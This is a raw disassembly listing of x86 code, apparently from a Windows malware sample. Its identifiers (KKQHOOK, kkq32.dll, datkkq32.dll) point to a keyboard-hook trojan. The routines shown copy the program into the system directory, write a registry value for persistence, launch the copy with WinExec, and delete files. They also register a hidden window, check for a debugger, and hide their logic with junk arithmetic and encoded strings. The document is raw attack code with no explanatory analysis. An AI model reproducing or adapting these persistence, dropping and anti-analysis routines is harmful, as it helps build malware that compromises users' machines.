mov eax, [ebp+var_4708]
cmp [ebp+var_35DC], eax
jb short loc_409FFC
call sub_40C794 ; GetProcessHeap
jmp loc_40A157
; ---------------------------------------------------------------------------
loc_409FFC: ; CODE XREF: sub_4098A8+748�j
lea edi, [ebp+var_471F]
lea esi, dword_446A04
mov ecx, 7
rep movsb
mov eax, 1Ah
sub eax, dword_43C098
push eax
lea eax, [ebp+var_46DA]
push eax
call sub_40172F
push 9
push offset dword_446CD0
call sub_40129C
lea edi, [ebp+var_46DA]
push edi
push offset dword_433EE0
push eax
lea edi, [ebp+var_400]
push edi
call sub_40CC50
call sub_40C854 ; IsDebuggerPresent
lea eax, [ebp+var_400]
push eax
call sub_40341E
mov [ebp+var_46FC], 3814h
add [ebp+var_46FC], 12E1h
push 1
push offset byte_446CE0
call sub_40129C
lea edi, [ebp+var_604]
push edi
push 0
push [ebp+var_35DC]
push eax
push offset aKkqhook ; "KKQHOOK"
lea edi, [ebp+var_400]
push edi
lea edi, [ebp+var_45DB]
push edi
push offset dword_40E080
call sub_4061F7
mov ebx, eax
mov [ebp+var_46FE], 486Fh
movzx eax, [ebp+var_46FE]
imul eax, 20EDh
mov [ebp+var_46FE], ax
lea eax, [ebp+var_400]
push eax
call sub_40C704 ; DeleteFileA
lea edi, [ebp+var_4724]
lea esi, aUw ; "UW|'"
mov ecx, 5
rep movsb
lea eax, [ebp+var_400]
push eax
call sub_40349A
add esp, 50h
mov [ebp+var_4700], 1BDh
movzx eax, [ebp+var_4700]
imul eax, 1736h
mov [ebp+var_4700], ax
or ebx, ebx
jz short loc_40A157
mov dword ptr [ebp-4730h], 1381h
sub dword ptr [ebp-4730h], 2095h
cmp [ebp+var_604], 0
jz short loc_40A157
push 4
push 4
lea eax, [ebp+var_604]
push eax
push offset aOfstkkqc ; "ofstkkqc"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_40160A
add esp, 18h
loc_40A157: ; CODE XREF: sub_4098A8+74F�j
; sub_4098A8+86E�j ...
push 0
push 80h
push 3
push 0
push 0
push 80000000h
push offset dword_415080
call sub_40C8CC ; CreateFileA
mov [ebp+var_46F0], eax
lea edi, [ebp+var_472C]
lea esi, aP2 ; ">:= P2"
movsd
movsd
cmp [ebp+var_46F0], 0FFFFFFFFh
jz loc_40A8A0
call sub_40C7C4 ; GetTickCount
push [ebp+var_46F0]
call sub_40C7AC ; CloseHandle
call sub_40C7C4 ; GetTickCount
lea eax, [ebp+var_45DB]
push eax
lea eax, [ebp+var_F08]
push eax
call sub_40CC50
mov [ebp+var_46E6], 4301h
movzx eax, [ebp+var_46E6]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_46E6], ax
push 6
push offset aIDsc ; "밹"
call sub_40129C
push eax
lea edi, [ebp+var_F08]
push edi
call sub_40CC74
mov [ebp+var_4701], 99h
movzx eax, [ebp+var_4701]
imul eax, 2D23h
mov [ebp+var_4701], al
lea eax, [ebp+var_400]
push eax
call sub_40341E
call sub_40C740 ; GetCurrentThreadId
mov eax, dword_43C094
add eax, 3
push eax
lea eax, [ebp+var_46DA]
push eax
call sub_40172F
push 9
push offset byte_446D1F
call sub_40129C
lea edi, [ebp+var_46DA]
push edi
push offset dword_433EE0
push eax
lea edi, [ebp+var_400]
push edi
call sub_40CC50
mov [ebp+var_4702], 0B2h
add [ebp+var_4702], 25h
push 1
push offset byte_446CE0
call sub_40129C
lea edi, [ebp+var_604]
push edi
push 0
push [ebp+var_35DC]
push eax
push offset aKkqhook ; "KKQHOOK"
lea edi, [ebp+var_400]
push edi
lea edi, [ebp+var_F08]
push edi
push offset dword_415080
call sub_4061F7
mov ebx, eax
lea eax, [ebp+var_400]
push eax
call sub_40C704 ; DeleteFileA
call sub_40C734 ; GetCurrentProcessId
lea eax, [ebp+var_400]
push eax
call sub_40349A
add esp, 68h
call sub_40C7C4 ; GetTickCount
or ebx, ebx
jz short loc_40A2DE
mov eax, dword_446A18
mov [ebp-4730h], eax
push offset dword_415080
call sub_40C704 ; DeleteFileA
loc_40A2DE: ; CODE XREF: sub_4098A8+51C�j
; sub_4098A8+A1F�j
cmp [ebp+var_25C4], 3Ah
jnz loc_40A499
cmp [ebp+var_25C1], 3Ah
jnz loc_40A499
call sub_40C734 ; GetCurrentProcessId
mov [ebp+var_25C1], 0
push 5
push offset byte_446CC3
call sub_40129C
lea edi, [ebp+var_35DC]
push edi
push eax
lea edi, [ebp+var_25C4]
push edi
call sub_40CC68
add esp, 14h
call sub_40C7D0 ; GetVersion
cmp [ebp+var_35DC], 0
jz short loc_40A35E
call sub_40CC38
mov edx, 621B97C3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov edi, eax
inc edi
cmp edi, [ebp+var_35DC]
ja loc_40A867
loc_40A35E: ; CODE XREF: sub_4098A8+A8B�j
mov [ebp+var_35DD], 36h
add [ebp+var_35DD], 1
cmp ds:dword_419720, 2
jnz short loc_40A3DE
mov [ebp+var_35DF], 79h
movzx eax, [ebp+var_35DF]
imul eax, 2939h
mov [ebp+var_35DF], al
push 400h
lea eax, [ebp+var_400]
push eax
call sub_40C7A0 ; GetSystemDirectoryA
push 0Ah
push offset dword_446CB8
call sub_40129C
lea edi, [ebp+var_400]
push edi
push eax
lea edi, [ebp+var_1010]
push edi
call sub_40CC50
push 8
push offset byte_446CAF
call sub_40129C
push eax
lea edi, [ebp+var_400]
push edi
call sub_40CC74
add esp, 24h
jmp short loc_40A43F
; ---------------------------------------------------------------------------
loc_40A3DE: ; CODE XREF: sub_4098A8+ACB�j
call sub_40C7C4 ; GetTickCount
push 400h
lea eax, [ebp+var_400]
push eax
call sub_40C7F4 ; GetWindowsDirectoryA
call sub_40C7C4 ; GetTickCount
push 0Eh
push offset dword_446CA0
call sub_40129C
lea edi, [ebp+var_400]
push edi
push eax
lea edi, [ebp+var_1010]
push edi
call sub_40CC50
call sub_40C734 ; GetCurrentProcessId
push 0Ch
push offset byte_446C93
call sub_40129C
push eax
lea edi, [ebp+var_400]
push edi
call sub_40CC74
add esp, 24h
call sub_40C734 ; GetCurrentProcessId
loc_40A43F: ; CODE XREF: sub_4098A8+B34�j
lea eax, [ebp+var_1010]
push eax
call sub_40C704 ; DeleteFileA
call sub_40C734 ; GetCurrentProcessId
push 8
push offset word_446C8A
call sub_40129C
lea edi, [ebp+var_25C4]
add edi, 4
push edi
lea edi, [ebp+var_400]
push edi
push eax
lea edi, [ebp+var_400]
push edi
call sub_40CC50
add esp, 18h
push 0
lea eax, [ebp+var_400]
push eax
call sub_40C938 ; WinExec
mov [ebp+var_35DE], 3Dh
add [ebp+var_35DE], 10h
loc_40A499: ; CODE XREF: sub_4098A8+A3D�j
; sub_4098A8+A4A�j
push 5
push offset dword_446C84
call sub_40129C
mov edi, 13h
sub edi, dword_43C098
push edi
push eax
lea edi, [ebp+var_25C4]
push edi
call sub_40181A
add esp, 14h
or eax, eax
jnz loc_40A62C
call sub_40C740 ; GetCurrentThreadId
mov [ebp+var_55DC], 1060h
sub [ebp+var_55DC], 872h
lea edi, [ebp+var_55E1]
lea esi, aQ ; "^:$q"
mov ecx, 5
rep movsb
mov eax, 19h
sub eax, dword_43C098
push eax
lea eax, [ebp+var_703]
push eax
call sub_40172F
push 9
push offset byte_446D1F
call sub_40129C
lea edi, [ebp+var_703]
push edi
push offset dword_433EE0
push eax
lea edi, [ebp+var_45D7]
push edi
call sub_40CC50
mov eax, dword_446A21
mov [ebp+var_55E6+1], eax
mov eax, dword_446A25
mov [ebp+var_55EA+1], eax
lea eax, [ebp+var_25BF]
push eax
lea eax, [ebp+var_55D6]
push eax
call sub_40C6D8
call sub_40C764 ; RtlGetLastWin32Error
push 3
push offset aMC ; ""
call sub_40129C
mov [ebp+var_55F0], eax
push 1
push offset byte_446CE0
call sub_40129C
push 0
push 0
push 0
push eax
mov edi, [ebp+var_55F0]
push edi
lea edi, [ebp+var_45D7]
push edi
lea edi, [ebp+var_55D6]
push edi
push 0
call sub_4061F7
add esp, 50h
mov ebx, eax
lea edi, [ebp+var_55EA]
lea esi, byte_446A29
xor ecx, ecx
inc ecx
rep movsb
cmp ebx, 2
jnz short loc_40A62C
mov [ebp+var_55F4], 554Dh
mov eax, 565Ch
mul [ebp+var_55F4]
mov [ebp+var_55F8], eax
mov [ebp+var_55F4], eax
push 0
lea eax, [ebp+var_45D7]
push eax
call sub_40C938 ; WinExec
push 6
push offset aGvJ ; ""
call sub_40129C
mov edi, 13h
sub edi, dword_43C098
push edi
push eax
lea edi, [ebp+var_55D6]
push edi
call sub_40181A
add esp, 14h
cmp eax, 0FFFFh
jz short loc_40A62C
mov eax, 13h
sub eax, dword_43C098
push eax
call sub_40CBFC
pop ecx
loc_40A62C: ; CODE XREF: sub_4098A8+C1B�j
; sub_4098A8+D12�j ...
push 5
push offset byte_446C73
call sub_40129C
mov edi, 6
sub edi, dword_43C094
push edi
push eax
lea edi, [ebp+var_25C4]
push edi
call sub_40181A
add esp, 14h
or eax, eax
jnz loc_40A867
mov ax, word_446A2A
mov [ebp+var_5602], ax
call sub_40C7C4 ; GetTickCount
push 0
push 0
push 2
push 0
push 0
push 40000000h
push offset dword_41E8D0
call sub_40C8CC ; CreateFileA
mov [ebp+var_45E8], eax
mov [ebp+var_55F0], 3Ch
add [ebp+var_55F0], 5583h
push 6
push offset aSA ; "輠"
call sub_40129C
add esp, 8
push 0
lea edi, [ebp+var_55EC]
push edi
mov edi, 18h
sub edi, dword_43C098
push edi
push eax
push [ebp+var_45E8]
call sub_40C944 ; WriteFile
lea eax, [ebp+var_25BF]
push eax
lea eax, [ebp+var_45DB]
push eax
call sub_40C6D8
mov word ptr [ebp+var_55F4+2], 1AEFh
inc word ptr [ebp+var_55F4+2]
lea ecx, [ebp+var_45DB]
or eax, 0FFFFFFFFh
loc_40A6FD: ; CODE XREF: sub_4098A8+E5A�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40A6FD
mov [ebp+var_45E0], eax
mov [ebp+var_35DC], 0
jmp short loc_40A73A
; ---------------------------------------------------------------------------
loc_40A716: ; CODE XREF: sub_4098A8+E9E�j
mov eax, [ebp+var_35DC]
cmp [ebp+eax+var_45DB], 7Ch
jnz short loc_40A734
mov eax, [ebp+var_35DC]
mov [ebp+eax+var_45DB], 0
loc_40A734: ; CODE XREF: sub_4098A8+E7C�j
inc [ebp+var_35DC]
loc_40A73A: ; CODE XREF: sub_4098A8+E6C�j
mov eax, [ebp+var_45E0]
cmp [ebp+var_35DC], eax
jb short loc_40A716
lea edi, [ebp+var_5609]
lea esi, aV_ngv ; "V_Ngv+"
mov ecx, 7
rep movsb
and [ebp+var_45E4], 0
loc_40A762: ; CODE XREF: sub_4098A8+F90�j
push 1Fh
push offset dword_446C4C
call sub_40129C
mov edi, [ebp+var_45E4]
lea edi, [ebp+edi+var_45DB]
push edi
push eax
lea edi, [ebp+var_55EA+3]
push edi
call sub_40CC50
add esp, 14h
mov byte ptr [ebp+var_55F4+1], 0CCh
add byte ptr [ebp+var_55F4+1], 1
lea ecx, [ebp+var_55EA+3]
or eax, 0FFFFFFFFh
loc_40A7A3: ; CODE XREF: sub_4098A8+F00�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40A7A3
push 0
lea esi, [ebp+var_55EC]
push esi
push eax
lea edi, [ebp+var_55EA+3]
push edi
push [ebp+var_45E8]
call sub_40C944 ; WriteFile
mov [ebp+var_55F8], 0FBh
mov eax, 2DF3h
mul [ebp+var_55F8]
mov [ebp+var_5610], eax
mov eax, [ebp+var_5610]
mov [ebp+var_55F8], eax
mov eax, [ebp+var_45E4]
mov [ebp+var_5614], eax
lea ecx, [ebp+eax+var_45DB]
or eax, 0FFFFFFFFh
loc_40A803: ; CODE XREF: sub_4098A8+F60�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40A803
mov esi, [ebp+var_5614]
add esi, eax
mov [ebp+var_45E4], esi
mov [ebp+var_55F9], 17h
add [ebp+var_55F9], 0FAh
inc [ebp+var_45E4]
mov eax, [ebp+var_45E0]
cmp [ebp+var_45E4], eax
jb loc_40A762
mov [ebp+var_55FA], 0B8h
sub [ebp+var_55FA], 50h
push [ebp+var_45E8]
call sub_40C7AC ; CloseHandle
mov [ebp+var_5600], 5720h
inc [ebp+var_5600]
loc_40A867: ; CODE XREF: sub_4098A8+395�j
; sub_4098A8+3AE�j ...
lea eax, [ebp+var_600]
push eax
push [ebp+var_708]
push [ebp+var_F0C]
call sub_401BB7
add esp, 0Ch
mov [ebp+var_708], eax
or eax, eax
jnz loc_409C42
push [ebp+var_F0C]
call sub_40C884 ; LocalFree
call sub_40C7D0 ; GetVersion
loc_40A8A0: ; CODE XREF: sub_4098A8+2FB�j
; sub_4098A8+35B�j ...
call sub_408B4C
call sub_40C764 ; RtlGetLastWin32Error
fld dbl_446C44
fimul dword_43C0BC
mov edi, eax
call sub_40C630
xchg eax, edi
push edi
call sub_40CBF0
mov edi, dword_43C0C0
sub edi, eax
inc edi
mov [ebp+var_1014], edi
mov eax, dword_446A33
mov [ebp+var_1162], eax
mov eax, edi
mov [ebp-15C8h], eax
push eax
call sub_40CBF0
add esp, 8
mov edi, [ebp-15C8h]
add edi, eax
mov [ebp+var_1014], edi
call sub_40C854 ; IsDebuggerPresent
mov eax, edi
mov edi, dword_43C0C0
sub edi, dword_43C0BC
mov ecx, edi
inc ecx
xor edx, edx
div ecx
mov [ebp+var_15CC], eax
mov [ebp+var_1014], eax
call sub_40C854 ; IsDebuggerPresent
call sub_40CC38
mov [ebp+var_15D0], eax
mov eax, dword_43C0BC
mov edx, 66666667h
push ecx
mov ecx, eax
imul edx
sar edx, 1
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
lea edi, [eax+eax*4]
mov esi, [ebp+var_1014]
mov edx, [ebp+var_15D0]
mov eax, esi
imul eax, [ebp+var_15D0]
mov ecx, 0Ah
cdq
idiv ecx
lea edi, [edi+edx+5]
mov dword_43C0BC, edi
call sub_40C7C4 ; GetTickCount
mov eax, dword_43C0C0
cmp dword_43C0BC, eax
jbe short loc_40A98F
and dword_43C0BC, 0
loc_40A98F: ; CODE XREF: sub_4098A8+10DE�j
lea edi, [ebp+var_1163]
lea esi, byte_446A37
xor ecx, ecx
inc ecx
rep movsb
push 30D40h
call sub_40CBD8
pop ecx
call sub_40C764 ; RtlGetLastWin32Error
jmp loc_40993B
sub_4098A8 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A9BC proc near ; CODE XREF: sub_40AA24+11�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = word ptr -2
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
call sub_40C7D0 ; GetVersion
mov [ebp+var_2], 7C9Bh
movzx eax, [ebp+var_2]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2], ax
push offset aKkqhook_29 ; "KKQHOOK_29"
push 0
push 1F0001h
call sub_40C890 ; OpenMutexA
mov [ebp+var_8], eax
or eax, eax
jz short loc_40AA21
call sub_40C764 ; RtlGetLastWin32Error
push [ebp+var_8]
call sub_40C7AC ; CloseHandle
mov [ebp+var_C], 7B70h
sub [ebp+var_C], 2C79h
mov eax, 13h
sub eax, dword_43C098
push eax
call sub_40CBFC
pop ecx
loc_40AA21: ; CODE XREF: sub_40A9BC+36�j
pop edi
leave
retn
sub_40A9BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AA24 proc near ; CODE XREF: sub_40C654+5C�p
var_7CF = byte ptr -7CFh
var_7C8 = dword ptr -7C8h
var_7C3 = byte ptr -7C3h
var_7C1 = byte ptr -7C1h
var_7C0 = dword ptr -7C0h
var_7BC = dword ptr -7BCh
var_7B8 = dword ptr -7B8h
var_7B4 = byte ptr -7B4h
var_7AF = byte ptr -7AFh
var_7AC = word ptr -7ACh
var_7AA = byte ptr -7AAh
var_7A2 = byte ptr -7A2h
var_79F = byte ptr -79Fh
var_797 = word ptr -797h
var_795 = byte ptr -795h
var_792 = byte ptr -792h
var_78C = byte ptr -78Ch
var_784 = byte ptr -784h
var_780 = dword ptr -780h
var_77C = word ptr -77Ch
var_77A = byte ptr -77Ah
var_67B = byte ptr -67Bh
var_57C = byte ptr -57Ch
var_478 = dword ptr -478h
var_474 = dword ptr -474h
var_470 = byte ptr -470h
var_36C = dword ptr -36Ch
var_367 = byte ptr -367h
var_366 = word ptr -366h
var_364 = dword ptr -364h
var_360 = dword ptr -360h
var_35B = byte ptr -35Bh
var_2F7 = byte ptr -2F7h
var_293 = byte ptr -293h
var_292 = word ptr -292h
var_290 = dword ptr -290h
var_28C = dword ptr -28Ch
var_286 = word ptr -286h
var_284 = dword ptr -284h
var_27E = word ptr -27Eh
var_27C = dword ptr -27Ch
var_278 = dword ptr -278h
var_272 = word ptr -272h
var_270 = byte ptr -270h
var_16C = dword ptr -16Ch
var_168 = byte ptr -168h
var_167 = byte ptr -167h
var_166 = word ptr -166h
var_164 = word ptr -164h
var_161 = byte ptr -161h
var_5D = byte ptr -5Dh
var_5C = dword ptr -5Ch
var_55 = dword ptr -55h
var_51 = dword ptr -51h
var_4D = dword ptr -4Dh
var_49 = dword ptr -49h
var_45 = dword ptr -45h
var_41 = dword ptr -41h
var_3D = dword ptr -3Dh
var_39 = dword ptr -39h
var_35 = dword ptr -35h
var_31 = dword ptr -31h
var_2D = byte ptr -2Dh
var_27 = byte ptr -27h
var_26 = byte ptr -26h
var_25 = byte ptr -25h
var_1D = byte ptr -1Dh
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push edi
call sub_40C764 ; RtlGetLastWin32Error
call sub_40A9BC
call sub_40C734 ; GetCurrentProcessId
mov ax, word_446A38
mov [ebp+var_77C], ax
push 104h
lea eax, [ebp+var_161]
push eax
call sub_40C7A0 ; GetSystemDirectoryA
mov [ebp+var_164], 7225h
sub [ebp+var_164], 4952h
push 13h
push offset byte_446C2F
call sub_40129C
push eax
lea edi, [ebp+var_161]
push edi
call sub_40CC74
add esp, 10h
push 0
push 0
push 3
push 0
push 0
push 80000001h
lea eax, [ebp+var_161]
push eax
call sub_40C8CC ; CreateFileA
mov [ebp+var_36C], eax
cmp eax, 0FFFFFFFFh
jnz short loc_40AAB8
call sub_40844F
jmp short loc_40AAC3
; ---------------------------------------------------------------------------
loc_40AAB8: ; CODE XREF: sub_40AA24+8B�j
push [ebp+var_36C]
call sub_40C7AC ; CloseHandle
loc_40AAC3: ; CODE XREF: sub_40AA24+92�j
call sub_40C764 ; RtlGetLastWin32Error
push 9
push offset aZ_1 ; ""
call sub_40129C
push eax
call sub_40C800 ; GlobalAddAtomA
call sub_40C7D0 ; GetVersion
mov eax, [ebp+arg_0]
mov ds:dword_41E8CC, eax
mov ds:dword_419710, 94h
call sub_40C764 ; RtlGetLastWin32Error
push offset dword_419710
call sub_40C7DC ; GetVersionExA
mov [ebp+var_166], 14B0h
movzx eax, [ebp+var_166]
imul eax, 2D29h
mov [ebp+var_166], ax
push 0FFh
push offset dword_433EE0
call sub_40C7A0 ; GetSystemDirectoryA
mov [ebp+var_167], 6Eh
movzx eax, [ebp+var_167]
imul eax, 5351h
mov [ebp+var_167], al
call sub_40C7C4 ; GetTickCount
push eax
call sub_40CC5C
mov [ebp+var_168], 59h
movzx eax, [ebp+var_168]
imul eax, 49B8h
mov [ebp+var_168], al
mov eax, dword_446A3A
mov [ebp+var_780], eax
push 104h
lea eax, [ebp+var_470]
push eax
push [ebp+arg_0]
call sub_40C770 ; GetModuleFileNameA
call sub_40C764 ; RtlGetLastWin32Error
and [ebp+var_5C], 0
mov [ebp+var_474], 4
mov [ebp+var_16C], 665Eh
mov eax, 6DB4h
mul [ebp+var_16C]
mov [ebp+var_7B8], eax
mov [ebp+var_16C], eax
lea eax, [ebp+var_784]
push eax
lea eax, [ebp+var_474]
push eax
lea eax, [ebp+var_5C]
push eax
push offset aKkqhook ; "KKQHOOK"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_4014C9
add esp, 24h
mov [ebp+var_478], eax
mov [ebp+var_5D], 0FBh
movzx eax, [ebp+var_5D]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_5D], al
cmp [ebp+var_478], 0
jz short loc_40AC5D
lea edi, [ebp+var_7C1]
lea esi, aAg9 ; " 9"
mov ecx, 5
rep movsb
cmp [ebp+var_5C], 1Dh
jbe short loc_40AC32
mov eax, 6
sub eax, dword_43C094
push eax
call sub_40CBFC
pop ecx
loc_40AC32: ; CODE XREF: sub_40AA24+1FA�j
cmp [ebp+var_5C], 1Dh
jz loc_40AE0C
mov [ebp+var_7BC], 6267h
mov eax, 5DE7h
mul [ebp+var_7BC]
mov [ebp+var_7C8], eax
mov [ebp+var_7BC], eax
loc_40AC5D: ; CODE XREF: sub_40AA24+1E1�j
lea edi, [ebp+var_78C]
lea esi, aDpuayyf ; "DpUyYF"
movsd
movsd
lea edi, [ebp+var_792]
lea esi, aWq6ug ; "wq6Ug"
mov ecx, 3
rep movsw
call sub_40CC38
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov edi, eax
add edi, 41h
mov edx, edi
mov [ebp+var_2D], dl
mov [ebp+var_272], 223Eh
movzx eax, [ebp+var_272]
imul eax, 298Dh
mov [ebp+var_272], ax
mov [ebp+var_1], 1
jmp short loc_40ACF3
; ---------------------------------------------------------------------------
loc_40ACC6: ; CODE XREF: sub_40AA24+2D4�j
call sub_40CC38
movzx edi, [ebp+var_1]
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov esi, eax
add esi, 61h
mov edx, esi
mov [ebp+edi+var_2D], dl
add [ebp+var_1], 1
loc_40ACF3: ; CODE XREF: sub_40AA24+2A0�j
mov al, [ebp+var_1]
cmp al, 8
jbe short loc_40ACC6
call sub_40C734 ; GetCurrentProcessId
mov [ebp+var_25], 0
call sub_40CC38
mov edx, eax
test dl, 1
jnz short loc_40AD21
call sub_40C764 ; RtlGetLastWin32Error
mov [ebp+var_27], 33h
call sub_40C734 ; GetCurrentProcessId
mov [ebp+var_26], 32h
loc_40AD21: ; CODE XREF: sub_40AA24+2E9�j
push 9
push offset byte_446C1B
call sub_40129C
lea edi, [ebp+var_2D]
push edi
push offset dword_433EE0
push eax
lea edi, [ebp+var_270]
push edi
call sub_40CC50
lea edi, [ebp+var_795]
lea esi, aRf ; "rf"
mov ecx, 3
rep movsb
push 0
lea eax, [ebp+var_270]
push eax
lea eax, [ebp+var_470]
push eax
call sub_40C86C ; CopyFileA
mov [ebp+var_278], 1F00h
add [ebp+var_278], 2126h
lea eax, [ebp+var_2D]
push eax
call sub_403BE7
mov ax, word_446A54
mov [ebp+var_797], ax
mov [ebp+var_5C], 1Dh
push 4
push 4
lea eax, [ebp+var_5C]
push eax
push offset aKkqhook ; "KKQHOOK"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_40160A
add esp, 34h
push 0
lea eax, [ebp+var_270]
push eax
call sub_40C938 ; WinExec
mov ebx, 5146h
mov eax, 3A35h
mul ebx
mov [ebp+var_7BC], eax
mov ebx, eax
call sub_40406B
mov [ebp+var_27C], 7EF6h
add [ebp+var_27C], 2A96h
mov eax, 13h
sub eax, dword_43C098
push eax
call sub_40C710 ; ExitProcess
call sub_40C764 ; RtlGetLastWin32Error
loc_40AE0C: ; CODE XREF: sub_40AA24+212�j
push 5
push offset byte_446C15
call sub_40129C
push offset aKkq32_dll ; "kkq32.dll"
push offset dword_433EE0
push eax
push offset dword_41FA00
call sub_40CC50
call sub_40C740 ; GetCurrentThreadId
push 5
push offset byte_446C15
call sub_40129C
push offset aDnkkq_dll ; "dnkkq.dll"
push offset dword_433EE0
push eax
push offset dword_40F1E0
call sub_40CC50
call sub_40C740 ; GetCurrentThreadId
push 5
push offset byte_446C15
call sub_40129C
push offset aDatkkq32_dll ; "datkkq32.dll"
push offset dword_433EE0
push eax
push offset dword_40E080
call sub_40CC50
mov [ebp+var_27E], 3039h
inc [ebp+var_27E]
push 0Eh
push offset byte_446BE5
call sub_40129C
push offset dword_433EE0
push eax
push offset dword_41E8D0
call sub_40CC50
push 0FFh
push offset dword_415080
call sub_40C7F4 ; GetWindowsDirectoryA
mov [ebp+var_284], 5F78h
mov eax, 6104h
mul [ebp+var_284]
mov [ebp+var_7C0], eax
mov [ebp+var_284], eax
push 9
push offset byte_446BDB
call sub_40129C
push eax
push offset dword_415080
call sub_40CC74
mov [ebp+var_286], 8EFh
sub [ebp+var_286], 6AEAh
lea eax, aKkqhook ; "KKQHOOK"
mov [ebp+var_31], eax
call sub_40C854 ; IsDebuggerPresent
mov eax, ds:dword_41E8CC
mov [ebp+var_45], eax
lea eax, sub_40B3E8
mov [ebp+var_51], eax
push 7F00h
push 0
call sub_40C9EC ; LoadCursorA
mov [ebp+var_3D], eax
mov [ebp+var_28C], 5A0Bh
inc [ebp+var_28C]
push 7F03h
push 0
call sub_40CA04 ; LoadIconA
mov [ebp+var_41], eax
call sub_40C7C4 ; GetTickCount
and [ebp+var_35], 0
push 0
call sub_40CAE8 ; GetStockObject
mov [ebp+var_39], eax
lea edi, [ebp+var_79F]
lea esi, a16xYi_ ; "16X<Yi_"
movsd
movsd
mov [ebp+var_55], 3
and [ebp+var_4D], 0
and [ebp+var_49], 0
lea eax, [ebp+var_55]
push eax
call sub_40CA94 ; RegisterClassA
mov [ebp+var_290], 4E7Bh
sub [ebp+var_290], 7B38h
push 0
push ds:dword_41E8CC
push 0
push 0
push 0
push 0
push 0
push 0
push 0CA0000h
push offset aKkqhook ; "KKQHOOK"
push offset aKkqhook ; "KKQHOOK"
push 0
call sub_40CAB8 ; CreateWindowExA
mov ds:dword_41C7BC, eax
push offset aKkqhook_29 ; "KKQHOOK_29"
push 0
push 0
call sub_40C950 ; CreateMutexA
call sub_40C7D0 ; GetVersion
push 2
call sub_402A48
add esp, 70h
call sub_40C764 ; RtlGetLastWin32Error
call sub_40C7D0 ; GetVersion
cmp eax, 80000000h
jb short loc_40B05B
mov eax, dword_446A5E
mov [ebp+var_7C8], eax
push 0Ch
push offset word_446BCE
call sub_40129C
push eax
call sub_40C77C ; GetModuleHandleA
mov edi, eax
push 16h
push offset aJZaJzJvDjZz ; ""
call sub_40129C
add esp, 10h
push eax
push edi
call sub_40C788 ; GetProcAddress
mov [ebp-7C4h], eax
call sub_40C734 ; GetCurrentProcessId
mov edi, 13h
sub edi, dword_43C098
push edi
push eax
call dword ptr [ebp-7C4h]
lea edi, [ebp+var_7CF]
lea esi, word_446A62
mov ecx, 7
rep movsb
loc_40B05B: ; CODE XREF: sub_40AA24+5CF�j
push 104h
lea eax, [ebp+var_57C]
push eax
push 0
call sub_40C770 ; GetModuleFileNameA
mov [ebp+var_292], 1A3Fh
inc [ebp+var_292]
lea eax, [ebp+var_57C]
push eax
call sub_40341E
push offset dword_41FA00
call sub_40341E
push offset dword_40F1E0
call sub_40341E
call sub_40C7C4 ; GetTickCount
push offset dword_40E080
call sub_40341E
call sub_40C7C4 ; GetTickCount
call sub_40C734 ; GetCurrentProcessId
push eax
call sub_4036BC
mov [ebp+var_293], 0A0h
sub [ebp+var_293], 3Ch
lea edi, [ebp+var_7A2]
lea esi, byte_446A69
mov ecx, 3
rep movsb
lea eax, [ebp+var_2F7]
push eax
call sub_40399B
call sub_40C734 ; GetCurrentProcessId
and [ebp+var_360], 0
mov [ebp+var_364], 64h
push 45h
push offset aZAgJIsJZAigGzi ; ""...
call sub_40129C
lea edi, [ebp+var_360]
push edi
lea edi, [ebp+var_364]
push edi
lea edi, [ebp+var_35B]
push edi
lea edi, [ebp+var_2F7]
push edi
push eax
push 80000002h
call sub_4014C9
call sub_40C764 ; RtlGetLastWin32Error
push 1
push offset byte_446B6F
call sub_40129C
push eax
lea edi, [ebp+var_35B]
push edi
call sub_4037CA
lea edi, [ebp+var_7AA]
lea esi, aAH@2du ; "$H@2dU"
movsd
movsd
push 1
push offset byte_446B6D
call sub_40129C
push eax
lea edi, [ebp+var_2F7]
push edi
call sub_4037CA
call sub_40C7C4 ; GetTickCount
mov ax, word_446A74
mov [ebp+var_7AC], ax
push 17h
push offset byte_446B55
call sub_40129C
lea edi, [ebp+var_35B]
push edi
push eax
lea edi, [ebp+var_77A]
push edi
call sub_40CC50
lea edi, [ebp+var_7AF]
lea esi, word_446A76
mov ecx, 3
rep movsb
lea eax, [ebp+var_360]
push eax
lea eax, [ebp+var_364]
push eax
lea eax, [ebp+var_67B]
push eax
push 0
lea eax, [ebp+var_77A]
push eax
push 80000000h
call sub_4014C9
lea eax, [ebp+var_67B]
push eax
call sub_40341E
call sub_40C854 ; IsDebuggerPresent
call sub_403A5F
mov [ebp+var_366], 6996h
movzx eax, [ebp+var_366]
imul eax, 6E78h
mov [ebp+var_366], ax
push offset sub_408048
call sub_407F07
add esp, 8Ch
lea eax, [ebp+var_7B4]
push eax
push 0
push 0
push offset sub_4098A8
push 0
push 0
call sub_40C980 ; CreateThread
push eax
call sub_40C7AC ; CloseHandle
call sub_40C740 ; GetCurrentThreadId
push 0
mov eax, dword_43C094
add eax, 1EFh
push eax
mov eax, 13h
sub eax, dword_43C098
push eax
push ds:dword_41C7BC
call sub_40C9F8 ; SetTimer
mov [ebp+var_367], 0ADh
add [ebp+var_367], 1
jmp short loc_40B2B0
